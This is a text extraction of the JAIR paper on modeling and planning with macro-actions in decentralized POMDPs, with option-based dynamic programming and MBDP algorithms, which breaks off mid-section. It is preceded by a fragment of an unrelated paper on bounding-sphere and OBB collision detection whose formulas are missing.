(3 parameters) and the radius (1 Parameters). The intersecting test method between the bounding balls is relatively simple. It is only necessary to compare the distance between the two spheres and the sum of their radius. The specific methods are as follows: Assuming the center and the radius of the two surrounding spheres are s1(x1, y1, z1), R1 and s2( x2, y2, z2), R2. If , Then two bounding balls intersected, otherwise, two bounding balls are not intersected. The detailed expression of this inequality is: 2) OBB(Oriented Bounding Box): It is a minimum rectangular body that contains a geometric object and has any direction in a coordinate system. How to find the best direction of the long cube when constructing OBB and determine the minimum number of reachable length and width is the key to the construction. Compared with the encircling ball, the construction of OBB seems very difficult, and the concrete construction method of OBB is as follows: B. Model Constructing C. Construction of Hierarchical Encircling Box Tree IV. System Application and Test Results V. Conclusion Acknowledgment References work_7wyyn4jlmzflvnev4k7qonrx2i ---- Journal of Artificial Intelligence Research 64 (2019) 817-859 Submitted 07/18; published 03/19 Modeling and Planning with Macro-Actions in Decentralized POMDPs Christopher Amato camato@ccs.neu.edu Khoury College of Computer Sciences, Northeastern University Boston, MA 02115 USA George Konidaris gdk@cs.brown.edu Department of Computer Science, Brown University Providence, RI 02912 USA Leslie P. Kaelbling lpk@csail.mit.edu MIT Computer Science and Artificial Intelligence Laboratory Cambridge, MA 02139 USA Jonathan P. How jhow@mit.edu MIT Laboratory for Information and Decision Systems Cambridge, MA 02139 USA Abstract Decentralized partially observable Markov decision processes (Dec-POMDPs) are gen- eral models for decentralized multi-agent decision making under uncertainty. However, they typically model a problem at a low level of granularity, where each agent’s actions are primitive operations lasting exactly one time step. We address the case where each agent has macro-actions: temporally extended actions that may require different amounts of time to execute. We model macro-actions as options in a Dec-POMDP, focusing on actions that depend only on information directly available to the agent during execution. Therefore, we model systems where coordination decisions only occur at the level of deciding which macro-actions to execute. The core technical difficulty in this setting is that the options chosen by each agent no longer terminate at the same time. We extend three leading Dec- POMDP algorithms for policy generation to the macro-action case, and demonstrate their effectiveness in both standard benchmarks and a multi-robot coordination problem. The results show that our new algorithms retain agent coordination while allowing high-quality solutions to be generated for significantly longer horizons and larger state-spaces than pre- vious Dec-POMDP methods. Furthermore, in the multi-robot domain, we show that, in contrast to most existing methods that are specialized to a particular problem class, our approach can synthesize control policies that exploit opportunities for coordination while balancing uncertainty, sensor information, and information about other agents. 1. Introduction The Dec-POMDP (Bernstein, Givan, Immerman, & Zilberstein, 2002; Oliehoek & Amato, 2016) is a general framework for decentralized sequential decision-making under uncertainty and partial observability. Dec-POMDPs model problems where a team of agents shares the same objective function, but where each individual agent can only make noisy, partial ob- servations of the environment. Solution methods for Dec-POMDPs aim to produce policies c©2019 AI Access Foundation. All rights reserved. Amato, Konidaris, Kaelbling & How that optimize reward while considering uncertainty in action outcomes, sensors, and infor- mation about the other agents. Although much research has been conducted on solution methods for Dec-POMDPs, solving large instances remains intractable. Advances have been made in optimal algorithms (see, for example, Amato, Chowdhary, Geramifard, Ure, & Kochenderfer, 2013; Amato, Dibangoye, & Zilberstein, 2009; Aras, Dutech, & Charpillet, 2007; Boularias & Chaib- draa, 2008; Dibangoye, Amato, Buffet, & Charpillet, 2013; Oliehoek, Spaan, Amato, & Whiteson, 2013; Dibangoye, Amato, Buffet, & Charpillet, 2016), but most approaches that scale well make very strong assumptions about the domain (e.g., assuming a large amount of independence between agents) (Dibangoye, Amato, Doniec, & Charpillet, 2013; Melo & Veloso, 2011; Nair, Varakantham, Tambe, & Yokoo, 2005) and/or have no guarantees about solution quality (Oliehoek, Whiteson, & Spaan, 2013; Seuken & Zilberstein, 2007b; Velagapudi, Varakantham, Sycara, & Scerri, 2011). One reason for this intractability is that actions are modeled as primitive (low-level) operations that last exactly one time step. The length of a single step can be adjusted (trading off solution quality for horizon length), but is always assumed to be the same for all agents. This allows synchronized action selection, but also requires reasoning about action selection and coordination at every time step. In single-agent (i.e., MDP) domains, hierarchical approaches to learning and planning (Barto & Mahadevan, 2003), exemplified by the options framework (Sutton, Precup, & Singh, 1999), have explored using higher-level, temporally extended macro-actions (or op- tions ) to represent and solve problems, leading to significant performance improvements in planning (Silver & Ciosek, 2012; Sutton et al., 1999). We now extend these ideas to the multi-agent case by introducing a Dec-POMDP formulation with macro-actions modeled as options. The primary technical challenge here is that decision-making is no longer syn- chronized: each agent’s options must be selected, and may complete, at different times. To permit coordination, agents must use their knowledge of option policies to reason about the progress of other agents and their impact on the world. The use of macro-actions in the multi-agent case can incorporate the benefits of the single agent case, such as simpler and more efficient modeling of real systems (e.g., robots with actions that execute predefined controllers) (Stone, Sutton, & Kuhlmann, 2005), more efficient planning (Sutton et al., 1999), skill transfer (Konidaris & Barto, 2007), and skill- specific abstractions (Konidaris & Barto, 2009; Dietterich, 2000). Additional benefits can be gained by exploiting known structure in the multi-agent problem. For instance, in some cases macro-actions may only depend on locally observable information. One example is a robot navigating to a waypoint in a security patrol application. Only local information is required for navigation, but choosing which waypoint to navigate to next requires reason- ing about the location and state of all the other robots. Macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. Furthermore, macro-actions can build on other macro-actions, allowing hierarchical planning. The resulting macro-action formulation allows asynchronous decision-making using actions with varying time durations. We therefore focus on the case where the agents are given local options that depend only on information locally observable to the agent during execution. Our results show that high-quality solutions can be found for a typical Dec-POMDP benchmark as well as large problems that traditional Dec-POMDP methods cannot solve: a four agent meeting-in-a- 818 Modeling and Planning with Macro-Actions in Decentralized POMDPs grid problem and a domain based on robots navigating among movable obstacles (Stilman & Kuffner, 2005). Our macro-action-based methods can scale well in terms of the problem horizon and domain variables, but do not directly target scalability in terms of the number of agents (although such extensions are possible in the future). Incorporating macro-actions into Dec-POMDPs results in a scalable algorithmic framework for generating solutions for a wide range of probabilistic multi-agent systems. One important application area for our approach is multi-robot systems. For single robots, automatic planning systems provide a flexible general-purpose strategy for con- structing plans given high-level declarative domain specifications, even in the presence of substantial stochasticity and partial observability (Thrun, Burgard, & Fox, 2005). By in- corporating macro-actions into Dec-POMDPs, we show that this strategy can be effectively extended to multi-robot systems: our methods naturally bridge Dec-POMDPs and multi- robot coordination, allowing principled decentralized methods to be applied to real domains. To solidify this bridge, we describe a process for creating a multi-robot macro-action Dec- POMDP (MacDec-POMDP) model, solving it, and using the solution to produce a set of executable SMACH (Bohren, 2010) finite-state machine task controllers. Our methods al- low automatic off-line construction of robust multi-robot policies that support coordinated actions—including generating communication strategies that exploit the environment to share information critical to achieving the group’s overall objective. 2. Background We now describe the Dec-POMDP and options frameworks, upon which our work is based. 2.1 Decentralized Partially-Observable Markov Decision Processes Dec-POMDPs (Bernstein et al., 2002) generalize POMDPs1 (Kaelbling, Littman, & Cas- sandra, 1998) and MDPs2 (Puterman, 1994) to the multi-agent, decentralized setting. As depicted in Figure 1, Dec-POMDPs model a team of agents that must cooperate to solve some task by receiving local observations and individually selecting and executing actions over a sequence of time steps. The agents share a single reward function that specifies their objective, but which is not typically observed during execution. Execution is decentralized because each agent must select its own action at each time step, without knowledge of the actions chosen or observations received by the other agents. Finally, the problem is partially observable because, while the formalism assumes that there exists a Markovian state at each time step, the agents do not have access to it. Instead, each agent receives a separate observation at each time step, which reflects its own partial and local view of the world. More formally, a Dec-POMDP is defined by a tuple 〈I,S,{Ai},T,R,{Ωi},O,h〉, where: • I is a finite set of agents. • S is a finite set of states with designated initial state distribution b0. • Ai is a finite set of actions for each agent i with A = ×iAi the set of joint actions. 1. POMDPs are Dec-POMDPs where there is only one agent or the decision-making by the agents is centralized. 2. MDPs are POMDPs where the state is fully observable. 819 Amato, Konidaris, Kaelbling & How Environment a1 o1 an on r Figure 1: An n-agent Dec-POMDP. Each agent i receives observatoons oi and executes actions ai; all agents receive a single collective reward r. • T is a state transition probability function, T : S ×A×S → [0, 1], that specifies the probability of transitioning from state s ∈ S to s′ ∈ S when actions ~a ∈ A are taken by the agents. Hence, T(s,~a,s′) = Pr(s′|~a,s). • R is a reward function: R : S × A → R, giving the immediate reward for being in state s ∈ S and taking actions ~a ∈ A. • Ωi is a finite set of observations for each agent, i, with Ω = ×iΩi the set of joint observations. • O is an observation probability function: O : Ω × A × S → [0, 1], the probability of the agents receiving observations ~o ∈ Ω given actions ~a ∈ A were taken which results in state s′ ∈ S. Hence O(~o,~a,s′) = Pr(~o|~a,s′). • h is the number of steps until the problem terminates, called the horizon. Note that while the actions and observations are factored with one factor per agent, the state—which represents the state of the whole system—need not be. The solution to a Dec-POMDP is a joint policy —a set of policies, one for each agent. In an MDP, a solution policy is represented directly as a mapping from states to actions. In partially observed settings, the agents do not have access to the state, and so must represent policies some other way. In POMDP settings it is typically possible to calculate the belief state—a probability distribution over the unobserved state—and represent the agent’s policy as a mapping from belief state to actions. However, this is not possible in the Dec-POMDP setting, because each agent would need access to the histories of all the other agents to calculate a (centralized) belief state. We therefore represent the history of each agent explicitly: the action-observation history for agent i, hAi = (a 0 i ,o 0 i , . . . ,a t i,o t i), represents the actions taken and observations received at each step (up to step t); the set of such histories for agent i is HAi . Each agent’s policies are then a function of the agent’s history, and are either represented as a policy tree, where the vertices indicate actions to execute and the edges indicate transitions conditioned on an observation, or as a finite state controller which executes in a similar manner. An example of each is given in Figure 2. The value of a joint policy, π, from state s is V π(s) = E [ h−1∑ t=0 γtR(~at,st)|s,π ] , 820 Modeling and Planning with Macro-Actions in Decentralized POMDPs a1 a2 a2 a1 a1 o1 o2 o1 o1 o2o2 a3 a3 (a) o1 o1 o2 o2 a2a1 (b) Figure 2: A single agent’s policy represented as (a) a policy tree and (b) a finite-state controller with initial state shown with a double circle. which represents the expected value of the immediate reward for the set of agents summed for each step of the problem given the action prescribed by the policy until the horizon is reached. In the finite-horizon case (which we consider in this paper), the discount factor, γ, is typically set to 1. An optimal policy beginning at state s is π∗(s) = argmaxπ V π(s). The goal is to maximize the total cumulative reward, beginning at some initial distribution over states b0. Dec-POMDPs have been widely studied and there are number of significant advances in algorithms (e.g., see recent surveys Amato et al., 2013; Oliehoek, 2012; Oliehoek & Amato, 2016). Unfortunately, optimal (and boundedly optimal) methods (Amato et al., 2009; Bernstein, Amato, Hansen, & Zilberstein, 2009; Aras et al., 2007; Boularias & Chaib- draa, 2008; Dibangoye et al., 2013; Oliehoek et al., 2013) do not scale to large problems and approximate methods (Oliehoek et al., 2013; Seuken & Zilberstein, 2007b; Velagapudi et al., 2011; Wu, Zilberstein, & Chen, 2010a; Wu, Zilberstein, & Jennings, 2013) do not scale or perform poorly as problem size (including horizon) grows. Subclasses of the full Dec- POMDP model have been explored, but they make strong assumptions about the domain (e.g., assuming a large amount of independence between agents) (Dibangoye et al., 2013; Melo & Veloso, 2011; Nair et al., 2005). The key question is then: how can scalability with respect to horizon and domain variables be achieved while making minimal (and accurate) assumptions about the problems being solved? Our solution to this question is the use of hierarchy in Dec-POMDPs. While many hierarchical approaches have been developed for multi-agent systems (e.g., Horling & Lesser, 2004), very few are applicable to multi-agent models based on MDPs and POMDPs. In this paper, the hierarchy will take the form of options replacing each agent’s primitive actions. The result is a general framework for asynchronous decision making operating at multiple levels of granularity that fits many real-world problems. As a result, we target scalability with respect to the problem horizon an domain variables (actions, observations and states), but leave scalability with respect to the number of agents to future work (e.g., by combining the methods from this paper with those that scale in terms of the number of agents). 821 Amato, Konidaris, Kaelbling & How Figure 3: A multi-robot warehouse domain. 2.2 Multi-Robot Domains Our work is motivated by multi-robot coordination domains. Consider the multi-robot warehousing problem (shown in Figure 3) that we present in the experiments. A team of robots is tasked with finding a set of large and small boxes in the environment and returning them to a shipping location. Large boxes require multiple robots to push. As a result, coordination is necessary not just for assigning robots to push specific boxes, but also because two robots are required to cooperate to push the larger box at the same time. There is stochasticity in the movements of robots and partial observability with respect to the location of the boxes and other robots: both can be only be detected when they are within range. We also consider cases where the robots can send communication signals to each other, but we do not define the meaning of the messages. Therefore, our planner must determine where the robots should navigate, what boxes they should push and what communication messages should be sent (if any) at each step of the problem to optimize the solution for the team. The robots must make these decisions based solely on the information they individually receive during execution (e.g., each robot’s estimate of its own location as well as where and when boxes and other robots have been seen). This multi-robot warehousing problem can be formalized as a Dec-POMDP.3 In fact, any problem where multiple robots share a single overall reward or cost function can be formulated as a Dec-POMDP. Therefore, a Dec-POMDP solver could potentially automat- ically generate control policies (including policies over when and what to communicate) for very rich decentralized control problems, in the presence of uncertainty. Unfortunately, this generality comes at a cost: as mentioned above, Dec-POMDPs are typically infeasible to solve except for very small problems (Bernstein et al., 2002). By contrast, we will show that by considering macro-actions, we retain the ability to coordinate while allowing high- quality solutions to be generated for significantly larger problems than would have been possible using other Dec-POMDP-based methods. In this example, macro-actions could 3. In fact, there is a common Dec-POMDP benchmark that can be thought of as a simple version of a warehouse problem (Seuken & Zilberstein, 2007a). 822 Modeling and Planning with Macro-Actions in Decentralized POMDPs be navigating to a small or large box, pushing a box (alone or with another robot) to a destination, or communicating with another robot. Macro-actions are a natural model for the modular controllers often sequenced to obtain robot behavior. The macro-action approach leverages expert-designed or learned controllers for solving subproblems (e.g., navigating to a waypoint or grasping an object), bridging the gap between traditional robotics research and work on Dec-POMDPs. This approach has the potential to produce high-quality general solutions for real-world heterogeneous multi-robot coordination problems by automatically generating control and communication policies. 2.3 The Options Framework The options framework (Sutton et al., 1999) provides methods for learning and planning using high-level actions, or options, in Markov decision processes. In that setting, an option is defined by a tuple: m = (βm,Im,πm), consisting of a stochastic termination condition, βm : S → [0, 1], which determines the probability with which an option ceases to execute in each state; an initiation set, Im ⊂ S, which determines whether or not an option can be executed from a state; and a stochastic option policy, πm : S ×A → [0, 1], that maps states to action execution probabilities. An option describes a policy that an agent can choose to execute from any state in Im, which results in the execution of policy πm until execution ceases according to βm. The set of options is termed M. For example, in the warehouse example above, an option-based macro-action may be navigating to a waypoint. In that case, the initiation set may be all states (it is available anywhere), the option policy may be a policy that navigates the robot to the waypoint location from any location and the termination condition may be the state that represents the waypoint location or a set of states within a given radius of the waypoint. There may also be terminal states for failure to reach the waypoint (e.g., states representing the robot getting stuck). The resulting problem is known as a Semi-Markov Decision Process, or SMDP (Sutton et al., 1999). Note that we can create an option for a single-step action a by defining πm(s,a) = βm(s) = 1,∀s, and Im = S. The option framework therefore generalizes the traditional MDP setting. The goal is to generate a (possibly stochastic) policy, µ : S×M → [0, 1], that selects an appropriate option given the current state. The Bellman equation for the SMDP is: V µ(s) = ∑ m µ(s,m) [ R(s,m) + ∑ s′ p(s′|s,m)V µ(s′) ] , where p(s′|s,m) = ∑∞ k=0 p m s (s ′,k)γk with pms (s ′,k) representing the probability that option m will terminate in state s′ from state s after k steps and R(s,m) is an expectation over discounted rewards until termination E[r t + γrt+1 + . . . + γk−1rt+k] (for executing option m starting at time t and terminating at time t + k). If the option-policies and the lower-level MDP is known, these quantities can be calculated from the underlying models. If these quantities are not known, learning can be used to generate a solution. 823 Amato, Konidaris, Kaelbling & How When the state is partially observable, these ideas can be directly transferred to the POMDP case. This can be done by representing the POMDP as a belief-state MDP. That is, given a current belief state, b, and a policy of option-based macro-actions, µ, the value can be calculated as: V µ(b) = ∑ m µ(b,m) [ R(b,m) + ∫ b′ p(b′|b,m)V µ(b′) ] , where µ(b,m) now selects a policy based on the belief state, R(b,m) = ∑ s b(s)R(s,m) and p(b′|b,m) = ∑∞ k=0 p m b (b ′,k)γk with pmb (b ′,k) representing the probability that option m will terminate in belief state b′ from belief b after k steps. Several POMDP methods have been developed that use option-based macro-actions (Theocharous & Kaelbling, 2003; He, Brunskill, & Roy, 2011; Lim, Sun, & Hsu, 2011). Using either of these approaches directly is not possible in a decentralized multi-agent setting. First, the centralized information (a state or belief state) that prior approaches use for high-level action selection is not present during execution in the Dec-POMDP setting. Consequently, the action selection function, µ, must be reformulated for the decentralized case. Second, in the multi-agent case the inclusion of temporally extended actions means that action selection is no longer synchronized across agents—some agents’ options would terminate while others are still executing. Therefore, it is not clear when macro-actions should be considered complete (i.e., up to which point rewards and transitions should be calculated), which complicates the definition of the reward and transition functions, R and p. We now introduce a framework that addresses these issues, thereby enabling the use of options in the Dec-POMDP setting. 3. Adding Options to Dec-POMDPs We extend the Dec-POMDP model by replacing the local actions available to each agent with option-based macro-actions. Specifically, the action set of each agent i, which is denoted Ai above, is replaced with a finite set of options Mi. Then, M = ×iMi the set of joint options, replacing A, the joint set of actions. We focus on local options for each agent i, each of which is defined by a tuple: mi = (βmi,Imi,πmi), where βmi : H A i → [0, 1] is a stochastic termination condition; Imi ⊂ H M i is the initiation set; and πmi : H A i × Ai → [0, 1] is the option policy. Note that H A i is agent i’s primitive action-observation history, while HMi is agent i’s macro-action-macro-observation history (or option history, which is formally defined below). The different histories allow the agents to locally maintain the necessary information to know how to execute and terminate macro- actions (based on low-level actions and observations, typically beginning when an option is first executed) and initiate them (based on high-level history information that is maintained over a longer timeframe). Such local options model systems where the execution of a particular option, once selected, does not require coordination between agents, but can instead be completed by the agent on its own. Decision making that enables coordination between agents need only happen at the level of which option to execute, rather than inside 824 Modeling and Planning with Macro-Actions in Decentralized POMDPs the options themselves. Of course, other (non-local) forms of options that control and depend on multiple agents are possible, but we discuss the local form due to its simplicity and generality. The macro-actions for the warehouse problem are discussed in 6.2.1, but, in short, macro-actions can be defined for navigation, pushing and communication. For example, there are macro-actions for navigating to each room that could contain boxes. For these macro-actions, the initiation set is all observations (they are available everywhere), the policy navigates the robot to the specified room using low-level observation information that is available to that robot (using low-level observation histories) and the termination condition consists of observations that are only possible inside the desired room (localization information within the room). 3.1 The MacDec-POMDP Model We will refer to Dec-POMDPs with such macro-actions as MacDec-POMDPs. In the MacDec-POMDP, the agent and state spaces remain the same as in the Dec-POMDP defi- nition, but macro-actions and macro-observations are added. Formally, a MacDec-POMDP is a tuple 〈I,S,{Mi},{Ai},T,R,{Zi},{Ωi},ζi,O,h〉, where: • I, S, {Ai}, T , R, {Ωi}, O and h are the same as the Dec-POMDP definition (and represent the ‘underlying’ Dec-POMDP), • Mi is a finite set of macro-actions for each agent i with M = ×iMi the set of joint macro-actions, • ζi is a finite set of macro-observations for each agent, i, with ζ = ×iζi the set of joint macro-observations, • Zi is a macro-observation probability function for agent i: Zi : ζi×Mi×S → [0, 1], the probability of the agent receiving macro-observation zi ∈ ζi given macro-action mi ∈ Mi has completed and the current state is s ′ ∈ S. Hence Zi(zi,mi,s′) = Pr(zi|mi,s′). Note that the macro-observations are assumed to be independently generated for each agent after that agent’s macro-action has completed. This is reasonable since macro-action com- pletion is asynchronous (making it uncommon that multiple macro-actions terminate at the same time) and are generated based on the underlying state (which could include informa- tion about the other agents). In the MacDec-POMDP, we will not attempt to directly represent the transition and reward functions, but instead infer them by using the underlying Dec-POMDP model or a simulator4. That is, because we assume either a model or a simulator of the underlying Dec-POMDP is known, we can evaluate policies using macro-actions in the underlying Dec-POMDP by either knowing that underlying Dec-POMDP model or having a simulator that implements such a model. This evaluation using the Dec-POMDP model or simulator can be thought of as ‘unrolling’ each agent’s macro-action and when any macro-action completes, selecting an appropriate next macro-action for that agent. As a result, a formal representation of higher-level transition and reward models is not necessary. 4. In related work based on the ideas in this paper, we do generate such an explicit model that considers time until completion for any macro-action, resulting in the semi-Markovian Dec-POSMDP (Omidshafiei, Agha-mohammadi, Amato, & How, 2017). 825 Amato, Konidaris, Kaelbling & How 3.2 Designing Macro-Observations In the MacDec-POMDP, macro-observations are assumed to be given or designed. De- termining the set of macro-actions that provides the necessary information, without un- necessarily adding problem variables remains an open question (as it is in the primitive observation case). In general, the high-level macro-observations can consist of any finite set for each agent, but some natural representations exist. For instance, the macro-observation may just be the particular terminal condition that was reached (e.g., the robot entered office #442). A lot of information is lost in this case, so macro-observations can also be action-observation histories, representing all the low-level information that took place during macro-action execution. When action-observation histories are used, initiation conditions of macro-actions can depend on the histories of macro-actions already taken and their re- sults. Option policies and termination conditions will generally depend on histories that begin when the macro-action is first executed (action-observation histories). While defining the ‘best’ set of macro-observations is an open problem, there is some work on choosing them and learning the macro-observation probability functions (Omidshafiei, Liu, Everett, Lopez, Amato, Liu, How, & Vian., 2017a). In this paper, we assume they are defined based on the underlying state (as defined above). The macro-observation probability function can be adapted to depend on terminal conditions or local observations rather than states. 3.3 MacDec-POMDP Solutions Solutions to MacDec-POMDPs map from option histories to macro-actions. An option history, which includes the sequence of macro-observations seen and macro-actions selected, is defined as hMi = (z 0 i ,m 1 i , . . . ,z t−1 i ,m t i). Here, z 0 i may be a null macro-observation or an initial macro-observation produced from the initial belief state b0. Note that while histories over primitive actions provide the number of steps that have been executed (because they include actions and observations at each step), an option history typically requires many more (primitive) steps to execute than the number of macro-actions listed. We can then define policies for each agent, µi, for choosing macro-actions that depend on option histories. A (stochastic) local policy, µi : H M i × Mi → [0, 1] then depends on these option histories and a joint policy for all agents is written as µ. The evaluation of such policies is more complicated than the Dec-POMDP case because decision-making is no longer synchronized. In cases when a model of macro-action execution (e.g., the option policy) and the underlying Dec-POMDP are available we can evaluate the high-level policies in a similar way to other Dec-POMDP-based approaches. Given a joint policy, the primitive action at each step is determined by the (high-level) policy, which chooses the macro-action, and the macro-action policy, which chooses the (primitive) action. This ‘unrolling’ uses the underlying Dec-POMDP to generate (primitive) transitions and rewards, but determines what actions to take from the macro-actions. The joint high-level and macro-action policies can then be evaluated as: V µ(s) = E [ h−1∑ t=0 γtR(~at,st)|s,π,µ ] . When the underlying Dec-POMDP and the macro-action policies are not available, we can use a simulator or a high-level model to execute the policies and return samples of the 826 Modeling and Planning with Macro-Actions in Decentralized POMDPs relevant values. Simulation is very similar to model-based evaluation, but uses Monte Carlo estimation as discussed in Section 5. For example, we can evaluate a joint 2-agent policy µ which begins with macro-actions m1 and m2 at state s and executes for t steps as: V µ t (m1,m2,s) = ∑ o1,o2 O(o1,o2,a1,a2,s) ∑ a1,a2 πm1 (o1,a1)πm2 (o2,a2) [ R(a1,a2,s)+ ∑ s′ T(s′,a1,a2,s) ∑ o′1,o ′ 2 O(o′1,o ′ 2,a1,a2,s ′) ( βm1 (o ′ 1)βm2 (o ′ 2) ∑ m′1,m ′ 2 µ1(o ′ 1,m ′ 1)µ2(o ′ 2,m ′ 2)V µ t−1(s ′,m′1,m ′ 2) (both terminate) + βm1 (o ′ 1) ( 1 −βm2 (o ′ 2) )∑ m′1 µ1(o ′ 1,m ′ 1)V µ t−1(m ′ 1,m2,s ′) (agent 1 terminates) + ( 1 −βm1 (o ′ 1) ) βm2 (o ′ 2) ∑ m′2 µ2(o ′ 2,m ′ 2)V µ t−1(m1,m ′ 2,s ′) (agent 2 terminates) + ( 1 −βm1 (o ′ 1) )( 1 −βm2 (o ′ 2) ) V µ t−1(m1,m2,s ′) )] , (neither terminates) where single observations are used instead of longer histories for macro-action policies, π, and termination conditions, β. For simplicity, we also use observations based on the current state, O(o1,o2,a1,a2,s), rather than the next state. The example can easily be extended to consider histories and the other observation function (as well as more agents). Also, note that macro-actions will be chosen from the policy over macro-actions µ based on the option history, which is not shown explicitly (after termination of a macro-action, a high-level macro-observation will be generated and the next specified macro-action will be chosen as described above). Note that agents’ macro-actions may terminate at different times; the appropriate action is then chosen by the relevant agent’s policy and evaluation continues. Because we are interested in a finite-horizon problem, we assume evaluation continues for h (primitive) steps. Given that we can evaluate policies over macro-actions, we can then compare these policies. We can define a hierarchically optimal policy µ∗(s) = argmaxµV µ(s) which defines the highest-valued policy among those that use the given MacDec-POMDP. Because a hierarchically optimal policy may not include all possible history-dependent policies, it may have lower value than the optimal policy for the underlying Dec-POMDP (the globally optimal policy ).5 A globally optimal policy can be guaranteed by including the primitive actions in the set of macro-actions for each agent and mapping the primitive observation function to the macro-observation function, because the same set of policies can be created from this primitive macro-action set as would be created in the underlying Dec-POMDP. However, 5. Unlike flat Dec-POMDPs, stochastic policies may be beneficial in the macro-action case because full agent histories are no longer used. This remains an area of future work. 827 Amato, Konidaris, Kaelbling & How m1 m2 (a) Step 1 m1 m1 m1 z1 z3 m1 m1 m2 z1 z3 m2 m1 m1 z1 z2 m2 z4 m2 m1 m2 z1 z2 m2 z4 (b) Step 2 of DP Figure 4: Policies for a single agent after (a) one step and (b) two steps of dynamic pro- gramming using macro-actions m1 and m2 and macro-observations z (some of which are not possible after executing a particular macro-action). this typically makes little sense, because it is at least as hard as planning in the underlying Dec-POMDP directly. 4. Algorithms Because Dec-POMDP algorithms produce policies mapping agent histories to actions, they can be extended to consider macro-actions instead of primitive actions by adjusting policy evaluation and keeping track of macro-action progress and termination. We discuss how macro-actions can be incorporated into three such algorithms; extensions can also be made to other approaches. In these cases, deterministic polices are generated which are represented as policy trees (as shown in Figure 4). A policy tree for each agent defines a policy that can be executed based on local information. The root node defines the macro-action to choose in the known initial state, and macro-actions are specified for each legal macro-observation of the root macro-action (as seen in Figure 4(b)). In the figure, macro-observations that are not shown are not possible after the given macro-action has completed. Execution continues until the primitive horizon h is reached, meaning some nodes of the tree may not be reached due to the differing execution times of some macro-actions. Such a tree can be evaluated up to a desired horizon using the policy evaluation given above (i.e., evaluation using the underlying Dec-POMDP model or simulator). All the methods we discuss use some form of search through the policy space to generate high-quality macro-action-based policies. 4.1 Dynamic Programming A simple exhaustive search method can be used to generate hierarchically optimal determin- istic policies which use macro-actions. This algorithm is similar in concept to the dynamic programming algorithm used in Dec-POMDPs (Hansen, Bernstein, & Zilberstein, 2004), but full evaluation and pruning (removing dominated policies) are not used at each step (since these cannot naturally take place in the macro-action setting). Instead we can exploit the structure of macro-actions to reduce the space of policies considered. Due to the inspira- tion from dynamic programming for finite-horizon Dec-POMDPs (Hansen et al., 2004), we retain the name for the algorithm, but our algorithm is not a true dynamic programming 828 Modeling and Planning with Macro-Actions in Decentralized POMDPs Algorithm 1 Option-based dynamic programming (O-DP) 1: function OptionDecDP(h) 2: t ← 0 3: PrimitiveHorizonBelowh ← true 4: Mt ←∅ 5: repeat 6: Mt+1 ←ExhaustiveBackup(Mt) 7: PrimitiveHorizonBelowh ←TestPolicySetsLength(Mt+1) 8: t ← t + 1 9: until PrimitiveHorizonBelowh = false 10: return Mt 11: end function algorithm as a full evaluation is not conducted and built on at every step (as discussed below). We can exhaustively generate all combinations of macro-actions by first considering each agent using any single macro-actions to solve the problem, as seen for one agent with two macro-actions (m1 and m2) in Figure 4(a). We can test all combinations of these 1- macro-action policies for the set of agents to see if they are guaranteed to reach (primitive) horizon h (starting from the initial state). If any combination of policies does not reach h with probability 1, we will not have a valid policy for all steps. Therefore, an exhaustive backup is performed by considering starting from all possible macro-actions and then for any legal macro-observation of the macro-action (represented as z in the figure), transitioning to one of the 1-macro-action policies from the previous step (see Figure 4(b)). This step creates all possible next (macro-action) step policies. We can check again to see if any of the current set of policies will terminate before the desired horizon and continue to grow the policies (exhaustively as described above) as necessary. When all policies are sufficiently long, all combinations of these policies can be evaluated as above (by flattening out the polices into primitive action Dec-POMDP policies, starting from some initial state and proceeding until h). The combination with the highest value at the initial state, s0, is chosen as the (hierarchically optimal) policy. Pseudocode for this approach is given in Algorithm 1. Here, Mt represents the set of (joint) macro-action policies generated for t (macro-action) steps. ExhaustiveBackup performs the generation of all possible next-step policies for each agent and TestPolicySet- sLength checks to see if all policies reach the given horizon, h. PrimitiveHorizonBelowh represents whether there is any tree that has a primitive horizon less than h. The algorithm continues until all policies reach h and the final set of policies Mt can be returned for evaluation. This algorithm will produce a hierarchically optimal deterministic policy because it constructs all legal deterministic macro-action policies that are guaranteed to reach hori- zon h. This follows from the fact that macro-actions must last at least one step and all combinations of macro-actions are generated at each step until it can be guaranteed that additional backups will cause redundant policies to be generated. Our approach represents exhaustive search in the space of legal policies that reach a desired horizon. As such it is 829 Amato, Konidaris, Kaelbling & How not a true dynamic programming algorithm, but additional ideas from dynamic program- ming for Dec-POMDPs (Hansen et al., 2004) can be incorporated. For instance, we could prune policies based on value, but this would require evaluating all possible joint policies at every state after each backup. This evaluation would be very costly as the policy would be flattened after each backup and all combinations of flat policies would be evaluated for all states for all possible reachable horizons. Instead, beyond just scaling in the horizon due to the macro-action length, another benefit of our approach is that only legal policies are generated using the initiation and terminal conditions for macro-actions. As seen in Figure 4(b), macro-action m1 has two possible terminal states while macro-action m2 has three. Furthermore, macro-actions are only applicable given certain initial conditions. For example, m1 may not be applicable after observing z4 and m2 may not be applicable after z1. This structure limits the branching factor of the policy trees produced and thus the number of trees considered. 4.2 Memory-Bounded Dynamic Programming Memory-bounded dynamic programming (MBDP) (Seuken & Zilberstein, 2007b) can also be extended to use macro-actions as shown in Algorithm 2. MBDP is similar to the dynamic programming method above, but only a finite number of policy trees are retained (given by parameter MaxTrees ) after each backup. After an exhaustive backup has been performed (in either DP or MBDP), at most |Mi|×|Mi,t−1||ζi| new trees for each agent i given the previous policy set Mi,t−1 is generated (although it will often be much less since many macro-actions may not be possible after a given macro-observation). The key addition in MBDP is that, next, a subset of t-step trees, M̂t, is chosen by evaluating the full set of trees, Mt, at states6 that are generated by a heuristic policy (Hpol in the algorithm). The heuristic policy is executed for the first h−t−1 steps of the problem.7 Heuristic policies can include centralized MDP or POMDP policies or random policies (or a combination of these), providing a set of possible states to consider at that depth. A set of MaxTrees states is generated and the highest valued trees for each state are kept. This process of exhaustive backups and retaining MaxTrees trees continues, using shorter and shorter heuristic policies until the all combinations of the retained trees reach horizon h. Again, the set of trees with the highest value at the initial state is returned. This approach is potentially suboptiomal because a fixed number of trees are retained, and tree sets are optimized over states that are both assumed to be known and may never be reached. Nevertheless, since the number of policies retained at each step is bounded by MaxTrees, MBDP has time and space complexity linear in the horizon. As a result, MBDP and its extensions (Amato et al., 2009; Kumar & Zilberstein, 2010; Wu et al., 2010a) have been shown to perform well in many large Dec-POMDPs. The macro-action-based extension of MBDP uses the structure provided by the initiation and terminal conditions 6. The original MBDP algorithm (Seuken & Zilberstein, 2007b) uses beliefs rather than states at lines 9 and 10 of the algorithm. Our algorithm could similarly use beliefs, but we discuss using states for simplicity. 7. Note that h is a primitive (underlying 